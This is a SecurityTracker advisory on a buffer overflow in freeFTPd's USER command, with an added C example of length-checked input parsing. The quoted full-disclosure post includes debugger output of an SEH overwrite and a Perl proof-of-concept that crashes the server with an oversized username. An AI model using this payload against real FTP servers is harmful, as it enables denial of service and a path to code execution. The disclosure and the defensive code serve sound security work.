SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   freeFTPd
Vendors:   freeftpd.com
freeFTPd Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1015230
SecurityTracker URL:  http://securitytracker.com/id/1015230
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 16 2005
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in freeFTPd. A remote user can cause the service to crash.

A remote user can send a USER parameter with more than 1012 characters to cause the target FTP server to crash.

barabas mutsonline reported this vulnerability.

Impact:   A remote user can cause the FTP service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  freeftpd.com/
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.
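
The Description and Cause fields above name a boundary error on the USER parameter. The following added example (not freeFTPd code and not part of the original advisory) shows a length-checked parse of a USER line before any copy; the function name, status codes and the 64-byte limit are assumptions chosen for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define MAX_USER_LEN 64 /* assumed policy limit, not a freeFTPd value */

enum user_status { USER_OK, USER_NOT_USER_CMD, USER_EMPTY, USER_TOO_LONG, USER_BAD_CHAR };

/* Validate one FTP control-channel line ("USER name\r\n"); line need not be
 * NUL-terminated. On USER_OK the name is copied to out and NUL-terminated. */
enum user_status parse_user_line(const char *line, size_t len, char *out, size_t out_sz)
{
    static const char verb[] = "USER";
    size_t i, start, n;
    /* Drop the CR/LF terminator so it is not counted as part of the name. */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;
    /* The verb is case-insensitive and must be followed by a space. */
    for (i = 0; i < 4; i++)
        if (i >= len || toupper((unsigned char)line[i]) != verb[i])
            return USER_NOT_USER_CMD;
    if (len == 4)
        return USER_EMPTY;
    if (line[4] != ' ')
        return USER_NOT_USER_CMD;
    for (start = 5; start < len && line[start] == ' '; start++)
        ;
    n = len - start;
    if (n == 0)
        return USER_EMPTY;
    /* Check the length against policy and destination size before writing a byte. */
    if (n > MAX_USER_LEN || n >= out_sz)
        return USER_TOO_LONG;
    for (i = 0; i < n; i++)
        if (!isgraph((unsigned char)line[start + i]))
            return USER_BAD_CHAR; /* control, space or non-ASCII byte */
    memcpy(out, line + start, n);
    out[n] = '\0';
    return USER_OK;
}

int main(void)
{
    char name[MAX_USER_LEN + 1], big[5 + 1013]; /* constructed oversized input */
    memcpy(big, "USER ", 5);
    memset(big + 5, 'A', 1013);
    printf("%d %d\n", parse_user_line("USER alice\r\n", 12, name, sizeof name),
           parse_user_line(big, sizeof big, name, sizeof name));
    return 0;
}
```

A non-OK status should end in an error reply to the client, never in truncating the name and continuing.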


 Source Message Contents

Subject:  [Full-disclosure] freeftpd USER bufferoverflow

Hi,

While drooling over my new Adriana Lima wallpaper, my tongue accidentally
hit my keyboard and more than 1012 chars were sent to the login screen of my
freeftpd server (which I use to backup my Adriana Lima pics). Guess
what...the server crashed! Luckily I attach ollydbg to every process I have
running and this is what I found:

ECX 50505050
EIP 77C460CB msvcrt.77C460CB
Log data, item 0
Address=77C460CB
Message=Access violation when reading [50505050]
77C460CB 8B01 MOV EAX,DWORD PTR DS:[ECX]

well, eip doesn't get overwritten, but SEH does:

0012B6CC 41414141
0012B6D0 42424242
0012B6D4 42424242
0012B6D8 43434343 Pointer to next SEH record
0012B6DC 47464544 SE handler

EIP 47464544

Log data, item 0
Address=47464544
Message=Access violation when executing [47464544]

I leave the exploit coding as an exercise...

enjoy

sample crash code:

#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005

use strict;
use Net::FTP;
my $user="\x41"x1011;
$user .="\x44\x45\x46\x47";#overwrite SEH
$user .="\x50"x400;

my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("$user","whatevah");
